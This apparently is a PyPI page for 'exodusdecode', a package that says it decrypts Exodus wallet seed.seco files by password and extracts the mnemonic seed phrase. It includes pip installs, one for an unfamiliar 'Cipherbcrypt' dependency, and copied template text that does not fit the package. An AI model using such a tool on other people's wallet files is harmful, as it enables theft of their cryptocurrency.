Skip to main content

Decode seed.seco file from Exodus)

Project description

ExodusDecode

N|Solid

Decode seed.seco file from Exodus, and crack by password ~ to Mnemonic phrase (seed)

Installation

Python requires Python.org v3,7+ to run. Install the dependencies and devDependencies and start the server.

python -m pip install pip
python -m pip install --upgrade pip
pip install pycryptodome
pip install Cipherbcrypt
pip install Mnemonic

Using

from ExodusDecode import ExodusWalletReader
w1 = ExodusWalletReader('wallets\\seed.seco')
data = w1.decrypt('Password')
print(ExodusWalletReader.extract_mnemonic(data))

License

MIT Encode Cipherbcrypt group

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

exodusdecode-1.1.tar.gz (3.1 kB view hashes)

Uploaded Source

Built Distribution

exodusdecode-1.1-py3-none-any.whl (3.5 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page